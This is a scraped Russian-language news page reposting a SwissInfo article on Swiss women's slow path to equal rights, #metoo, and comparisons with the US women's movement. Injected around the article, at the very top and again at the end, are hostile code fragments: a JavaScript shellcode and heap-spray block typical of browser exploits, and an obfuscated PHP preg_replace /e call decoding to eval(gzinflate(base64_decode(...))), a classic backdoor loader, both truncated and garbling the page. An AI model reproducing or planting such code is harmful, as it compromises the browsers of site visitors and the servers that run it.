%3cscript> var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580"); var spray = unescape("%u0a0a%u0a0a"); Швейцарские женщины на полпути к эмансипации
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65 \x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5 GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/
Европейская правда

Швейцарские женщины на полпути к эмансипации

Швейцарские женщины на полпути к эмансипации
Швейцарские женщины на полпути к эмансипации

В 2017 году в немецкоязычной части Швейцарии гонку на звание «слова года» выиграл хэштег #metoo, связанный с новомодным выражением «харрасмент». С его помощью в социальных сетях и сейчас продолжается флешмоб, в рамках которого жертвы сексуальных домогательств и злоупотреблений рассказывают о своих страданиях, желая обратить внимание общественности на эту проблему. Тем самым растущее среди современных женщин недовольство положением вещей в области обеспечения гендерного равенства добралось и до Швейцарии. Что это говорит нам в плане реальной социальной ситуации, в которой находятся сегодня швейцарки?

Швейцария — страна одновременно прогрессивная и консервативная. Нигде это противоречие не проявляется столь ярко, как в области обеспечения гендерного равноправия. С одной стороны (и мы уже про это подробно сообщали) в стране официально действует политика нулевой толерантности по отношению к любым формам сексуальных домогательств. Эта политика подкрепляется эффективной программой сексуального просвещения как в школах, так и просто на улицах. С другой стороны, в стране право голосовать на федеральном уровне швейцарки получили только в 1971 году, при этом зарабатывают женщины в Конфедерации все еще в среднем на четверть меньше мужчин.


Недавно хэштег #metoo, связанный с новомодным выражением «харрасмент», добрался и до Швейцарии. Как утверждает Сильвия Бинджели (Silvia Binggeli), главный редактор швейцарского женского журнала «Annabelle», основанного 80 лет назад, кампания в соцсетях против сексуальных домогательств и за равноправие полов, начатая в Соединенных Штатах в прошлом году, вышла за пределы интернета в реальный мир, придав новый импульс движению за права женщин в Швейцарии. 

Сама она в прошлом 2017 году участвовала в Цюрихе в манифестации женщин-активисток и удивилась количеству женщин и мужчин всех возрастов, пришедших на этот марш. По ее мнению, «сегодня движение за права женщин, немного приутихшее в последние годы, опять набирает темпы. Я вижу, что мои младшие коллеги гораздо более политически активны, чем еще десять лет назад». Так или иначе, но проблема равноправия полов по-прежнему остается весьма актуальной как для Швейцарии, так и для Соединенных Штатов.

«Четвертая волна»?

Если обратиться к истории вопроса, то, как правило, в Соединенных Штатах женское движение принято подразделять на три этапа. Первый отсчитывают с так называемой «Декларации Убеждений» («Declaration of Sentiments»), программного документа женского движения в США, подписанного 19 июля 1848 года 68 женщинами и 32 мужчинами — делегатами Первого конгресса по правам женщин, проходившего в г. Сенека-Фоллз (штат Нью-Йорк). За образец этой Декларации была взята Декларация независимости США.

Новый всплеск женское движение переживает в 1960-1970-х годах в рамках так называемой «Революции 1968 года». Третья «волна» началась в 1990 гг., ее начало часто связывают с делом «Анита Хилл против Кларенса Томаса». Напомним, в 1991 году против судьи Кларенса Томаса, которого президент Дж. Буш-старший назначил членом Верховного Суда, с публичными обвинениями в домогательствах выступила его бывшая подчиненная Анита Хилл, которая в итоге даже дала развернутые показания юридическому комитету Палаты представителей. Многие эксперты и историки предлагают считать сегодняшнее движение «четвертой волной».

В Швейцарии же женское движение за политические скорее напоминало долгое, медленное восхождение на скалистые вершины Альп. Фабьен Амлингер (Fabienne Amlinger), пресс-секретарь «Междисциплинарного центра гендерных исследований» при Бернском университете («Interdisziplinares Zentrum fur Geschlechterforschung» — «IZFG») считает, «применительно к Швейцарии аналогия с „волнами“ не является удачной моделью. Здесь никогда не было масштабной мобилизации женщин для достижения какой-то одной большой цели. Женское движение, скорее, существовало в форме отдельных локальных „ответвлений“, каждое из которых стремилось достичь той или иной отдельной цели».

«Ненаписанная история»

Одна из первых политических женский кампаний прошла в 1847 году в Берне, когда полторы сотни гражданок города выступили против действовавшего тогда в кантоне патриархального гендерного законодательства. А ровно 150 лет назад в 1868 году гражданка Женевы Мария Гоэгг-Пушулен (Marie Goegg-Pouchoulin, 1826 — 1899), основала «Association internationale des femmes» или «Международную ассоциацию женщин», первую международную правозащитную организацию, выступавшую за равенство мужчин и женщин в сфере образования, в праве наследования и в правовом отношении в целом, включая право для женщин голосовать, избирать и быть избранными. Однако вернемся в настоящее время. Маргрит Цинггелер (Margrit Zinggeler), швейцарка, переехавшая в США в возрасте 20 с небольшим лет, довольно неплохо разбирается в гендерной ситуации, характерной для обеих берегов Атлантики.

Джессика Дэвис Плюсс

Американка, живущая в Берне, независимый консультант и автор исследований о корпоративной ответственности и социальной роли бизнеса.

Jпубликовала ряд материалов о том, как бизнес мог бы могут способствовать улучшению ситуации в сфере гендерного равноправия, хотя бы в рамках своих собственных производственно-хозяйственных систем.

В своей книге «Сделано в Швейцарии — руками женщин. Ненаписанная история вклада женщин в успех Швейцарии» («Swiss Maid. The Untold Story of Women’s Contributions to Switzerland’s Success») она указывает, что «история Швейцарии всегда была это историей мужчин, войн, сделок и политических соглашений. Однако мы не сможем по-настоящему понять то, как формировались культура, традиции и государственные институты Швейцарии, не рассказав историю женщин, молчавших все это время или принуждавшихся к молчанию. Не сможем мы также ни вскрыть реальные механизмы формирования современной гендерной идентичности, ни понять, что нам еще необходимо сделать с тем, чтобы достичь настоящего равноправия».

Будучи профессором кафедры немецкого языка и германистики Университета Восточного Мичигана, она подчеркивает, что в Швейцарии на ранних этапах движения за женские права превалировали организации, добивавшиеся социальных и экономических прав, включая доступ к среднему и высшему образованию. Политические же требования оставались всегда на втором плане. «И только после того, как их образовательный уровень повысился до определенного „критического“ уровня, женщины осознали, что реального равноправия невозможно добиться без завоевания политических прав. И в этот момент ситуация изменилась в корне».

 «Ветхозаветный» взгляд на женщин

Все это, с другой стороны, вовсе не означает возникновения какого-то гомогенного национального политического движения за женские права. Фабьен Амлингер напоминает, что объективными причинами весьма медленного движения швейцарских женщин к обретению ими всей полноты гражданских прав являются (и во многом остаются) региональная раздробленность страны, партийно-политические разногласия (взгляд на перспективы женской эмансипации левых партий отличался от позиций партий бюргерского центра), а также различия города и деревни.

Швейцарские женщины на полпути к эмансипации

Впервые, кстати, вопрос предоставления женщинам права голосовать на федеральном уровне был вынесен на общенародное голосование в 1959 году. Завершился референдум отрицательно: 65% голосовавших мужчин выступили против. Как напоминает Маргрит Цинггелер, даже после того, как в 1971 году женщины эти права все-таки получили, движение за расширение и укрепление политических и социальных прав женщин развивалось исключительно в легальном поле, поскольку Швейцарии в этом плане сильно «повезло»: здесь не нужно идти бастовать на улицу, можно спокойно запустить законодательную инициативу и, добившись ее выноса на референдум, даже победить!

А вот движение за равноправие женщин в 1960-е годы в США развивалось совершенно иначе, используя насильственные методы социальной борьбы, такие, как забастовки, массовые протесты и сидячие демонстрации. Именно поэтому изобретенный медийный образ сжигающих бюстгальтер феминисток оказался очень близок к реальности, причем настолько, что большинство американцев приняли его за чистую монету. Хотя, чтобы быть уж совсем точным, одна демонстрация в Швейцарии все-таки состоялась. Она прошла в Берне в 1991 году, а ее участницы протестовали против слишком медленной, по их мнению, реализации на практике положений Конституции страны, гарантирующих равенство мужчин и женщин.

Бывали и другие скандальные моменты, например, когда кандидат от социал-демократов Кристина Бруннер (Christina Brunner) не была избрана в состав Федерального совета, правительства Швейцарии, что спровоцировало волну протестов и стало началом процесса важных изменений в швейцарском гендерном законодательстве. Фабьен Амлингер напоминает, что «Швейцария построена на принципах федерализма, строго снизу-вверх, а потому политические решения тут принимаются относительно неторопливо. Но зато те из них, что все-таки были реализованы, имеют огромную степень демократической легитимации и действуют годами и десятилетиями».

Швейцарские женщины на полпути к эмансипации

В самом деле, положение о гарантированном равноправии полов было включено в текст швейцарской конституции в 1981 году, и как мы видели, даже спустя 10 лет число недовольных тем, как это положение реализуется на практике, было относительно велико. По крайней мере, их хватило для проведения мощной демонстрации. Формально давно уже существовавшее право на оплачиваемый отпуск по уходу за новорожденным реально заработало в Конфедерации только в 2005 году — в США подобных социальных гарантий нет до сих пор. В обеих странах, правда, есть, например, право на искусственное прерывание беременности, но в США его реализации приходится добиваться каждый раз заново.

Феминизм «на своих условиях»

Вывод один: борьба за гендерное равноправие что в США, что в Швейцарии отнюдь не завершена. В прошлом 2017 году швейцарские избиратели отвергли предложение включить в трудовое законодательство положение о предоставлении отцам оплачиваемого отпуска по уходу за новорожденным. Дискриминация при трудоустройстве, неравенство в оплате труда и сексуальные домогательства остаются ключевыми проблемами в обеих странах.

Маргрит Цинггелер отмечает и другие «проблемные сферы», такие, как обязательная военная служба только для мужчин и легализованная в Швейцарии проституция. И тем не менее: можно ли говорить о том, что женское движение за равные права переживает эпоху «четвертой волны»? Совершенно очевидно, что сегодня оно по формам борьбы заметно отличается от того, что было еще даже четверть века назад.

Оно, скорее, обращает теперь внимание уже не на букву, но на дух закона, на то, каким образом законодательство реализуется на практике. Как говорит Сильвия Бинджели, «в Швейцарии, возможно, нет голливудских звезд, выступающих в защиту прав женщин, как в США, но зато тут есть, например, активное, деятельное сообщество женщин-предпринимательниц, интеллектуалов и созидательниц, пример которых вдохновляет новое поколение женщин на то, чтобы не копировать чужие образцы, но действовать по-своему и на своих условиях».

В опубликованном в 2014 году эссе «Мы все должны быть феминистами», писательница из Нигерии Чимаманда Нгози Адичие (Chimamanda Ngozi Adichie) утверждает, что быть феминисткой/феминистом — значит признавать тот факт, что «с существующей на данный момент гендерной ситуацией есть проблемы, и что нам необходимо решать их, добиваться большего. Все мы, женщины и мужчины, должны добиваться большего».

Швейцарские женщины на полпути к эмансипации


Передает: Швейцарский новостной информационный портал SwissInfo.ch
Просмотров:
  •    

Мы в социальных сетях:    Twitter    FaceBook    Google+

Добавить комментарий








Информация

Комментировать статьи на нашем сайте возможно только в течении 40 дней со дня публикации.

При полном или частичном воспроизведении материалов прямая гиперссылка на сайт www.europravda.com.ua обязательна. Редакция не всегда разделяет мнения публикуемых материалов и не несет ответственности за достоверность и правдивость размещенной информации взятой с открытых источников. В случае необходимости использования текстовых, фото, графических, информационно-графических, видео, аудио и иных размещенных материалов, права на которые принадлежат третьим лицам, необходимо обращаться непосредственно к правообладателям. Если Вы являетесь автором материала или обладателем авторских прав на него и против его использования на сайте europravda.com.ua, пожалуйста свяжитесь с нами. Сайт не рекомендуется для чтения лицам младше + 18 лет. Редакция сайта открыта для сотрудничества, новых идей и предложений. Для связи с нами, пожалуйста используйте форму обратной связи.
<рhp preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65 \x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5 GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/